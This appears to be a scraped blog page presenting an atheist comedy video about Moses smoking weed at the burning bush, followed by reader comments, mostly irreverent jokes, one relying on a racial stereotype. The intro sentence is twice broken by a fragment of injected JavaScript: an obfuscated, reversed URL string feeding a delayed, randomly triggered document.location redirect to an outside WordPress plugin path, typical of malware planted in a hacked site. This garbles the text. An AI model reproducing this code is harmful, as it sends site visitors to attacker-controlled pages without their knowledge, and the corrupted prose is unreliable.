Atheist Comedy: Moses Smokes Weed!

Moses Smokes Weed: The Bible fairy tale of a guy who hears God “talk” toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to him after using a burning bush toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to get high…

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33 thoughts on “Atheist Comedy: Moses Smokes Weed!”

  1. Douglas Becker says:

    This explains so much. Pharaoh smoking dope would have started a long tradition of politicians being on SOMETHING.

    Israelites to Moses: Haven't we seen you around this joint before?

    The Bible says that wine cheers the hearts of God and men, but marijuana come first, which certainly explains the writers of Scripture.

    Hint: Bibles are very popular in India, because the paper is excellent to use to roll cigarettes. We finally have a place to recycle all those Gideon Bibles from hotel and motel rooms.

    Both really very funny and… strange!

  2. stargazer says:

    I've always wondered how a bush could catch fire and then talk. Now it all makes sense!

  3. mely says:

    Probably smoked harder stuff than weed lol, seeing a talking bush requires something hard

  4. rickn8or says:

    "An all-powerful god" who had Noah and Moses do all the heavy lifting.

  5. Rand Huso says:

    Makes more sense than the literal reading.

  6. Dexx the Duck says:

    "I am that I am" = "A dog is a dog". I guess my dog's name is now Dog

  7. Whispermast says:

    Why do you think that all happened in a single day? I mean the kill the Egyptian, get married, etc? It wasn't one day.

  8. Rogelio Perea says:

    It had to be organic weed… has to! 😀

  9. Stefan Travis says:

    Hey kids, Just Say No to religion.

  10. Stephen says:

    HOLY SMOKE….And god doth chill out with his homeboy Moses.

  11. Patricia says:

    Well now that's perfectly logical & sensible, so now I totally understand! (HUH???!!!!!)

  12. bobbytookalook says:

    Burning bushes are a gateway drug!

  13. Rob W says:

    It must have been the perfect hybrid blend of Indica, and Sativa.

  14. AndDiracisHisProphet says:

    oh, n n n n no, nono 😀

  15. Dixieladd says:

    Thank you! I've always said it was funny how Moses only hears God after approaching a burning bush – him getting high and hallucinating God's voice makes much more sense than a bush spontaneously combusting just so God can talk to him. I mean… he's God. Why does he need to set a bush on fire to talk to someone?

    Either that, or maybe Moses hated being a shepherd so he set the bush on fire in hopes of it spreading and killing the sheep. But he was caught, and when he was asked what he was doing he said "No, the bush was totally on fire when I got here!" And when he was asked why the bush spontaneously combusted, he said "Uh… God? Yeah, God! The bush burst into flames and God spoke to me!" And that's how a religion got started! Just a thought.

  16. Lawrence Houser says:

    Interesting that Moses kicked the bucket at 120 years old, which is not bad but still peanuts compared to the 950 that Noah lived to. How come no one in the bible lived to, like 77, or 53?

  17. Hikikomori Boi says:

    254 views… Huh… Why is this not 254M? Fucking bible.

  18. Dennis Wicker says:

    Moses should have looked up his wife's bush, no smoke or fire there.

  19. Toni Jordon says:

    LOL!! Love it.

  20. Doug van der Hoop says:

    Brilliant, that's all. This is just pure genius at it's best. It's sarcastic and very humorous, and yet it just tells the bible stories in a light that really does truthfully expose how stupid and idiotic they actually are. I now have moved to being an avid fan of this channel!

  21. Joseph Stokes says:

    Hi Linda, Maybe they had LSD when they were concocting these fairly tales? That would explain a lot!! LOL Thanks for yet another thought provoking video!!! Please carry on!!

  22. robtbo says:

    And the LORD said Then I AM THAT I AM gonna make you wander through the desert with the people you freed bitching at you until you die. That's fucked up, right?

    And Moses asked Wait, what?

    And the LORD said Hm? Oh, nothing. Look at this magic stick, dude!

  23. McGee Fio says:

    Brilliant! I wondered if Moses was on something.

  24. Sabine Miehlbradt says:

    Right – now all we need is some bible scholars to tell us what kind of bush it was. Sounds like it's time of some in-depth botany study.

  25. Journally Dentiesiv says:

    Just say no to drugs, kids! Always, always say no! Or else you'll be brainwashed for life!

  26. Devil_Travels says:

    I'm guessing the ark of the covenant is where Moses stashed his best stuff which explains why when the Nazi's opened it, they has some wild visions.

  27. Newwayofthinking... says:

    Exceptional job of multitasking, both task performed well. Look forward to your post.

  28. carlystur says:

    Can't wait for the next one where Moses actually goes to the Pharoah to do the "Let my people go" thing!

  29. AntiReligious says:

    My hypothesis has been proven. Moses is black. Burning weed and smoking it and does not even share it along with his magic pipe stick he constantly carries. That is some powerful shit. Yeah he is black. That is how we do 🙂

  30. Steven Baumann says:

    I'm sorry I missed this one. I was balls deep in the Canadian wilderness contracting skeeter syndrome. Unlike Moses, I wasn't tent hot boxing it. I can't speak for Ezra. Although, pizza sounds great right about now!

  31. xaenon says:

    She reminds me of Judy Tenuta.

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